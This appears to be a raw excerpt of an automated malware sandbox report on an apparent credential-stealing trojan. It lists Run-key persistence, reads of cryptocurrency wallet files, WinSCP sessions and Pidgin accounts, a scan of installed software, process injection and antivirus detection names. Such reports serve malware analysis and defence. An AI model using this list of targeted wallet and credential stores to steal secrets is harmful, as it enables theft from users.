reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lI7YtB0GayusEC9XscvmBT7EJnQWNlWb reg_value C:\Users\test22\Documents\DJtHiqofXxujoI7GumjaPR5W.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\314p2pa9cwO4eorzwH1NZRoRK2OGvd3z reg_value C:\Users\test22\Documents\PpnOn8liJX3aK7YNgZgUxpNB.exe
file C:\Users\test22\AppData\Roaming\Bitcoin\wallets
file C:\Users\test22\AppData\Roaming\Electrum\wallets
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002e0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
FireEye Generic.mg.176a67399e1fd4d5
CrowdStrike win/malicious_confidence_100% (W)
APEX Malicious
Avast FileRepMalware
Kaspersky UDS:Trojan-PSW.MSIL.Racealer.gen
SentinelOne Static AI - Malicious PE
Avira TR/ATRAPS.Gen
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Backdoor:Win32/Bladabindi!ml
Cynet Malicious (score: 90)
BitDefenderTheta Gen:NN.ZemsilF.34662.am0@aiMTC!e
Malwarebytes Trojan.Downloader.MSIL.Generic
AVG FileRepMalware
Cybereason malicious.cb9ff2
Paloalto generic.ml
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Process injection Process 3056 resumed a thread in remote process 2620
Process injection Process 2520 resumed a thread in remote process 2632
Process injection Process 2632 resumed a thread in remote process 752
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002cc
suspend_count: 1
process_identifier: 2620
1 0 0

NtResumeThread

thread_handle: 0x000000f4
suspend_count: 0
process_identifier: 2632
1 0 0

NtResumeThread

thread_handle: 0x000002d8
suspend_count: 1
process_identifier: 752
1 0 0
Time & API Arguments Status Return Repeated

__anomaly__

tid: 2612
message: Encountered 65537 exceptions, quitting.
subcategory: exception
function_name:
1 0 0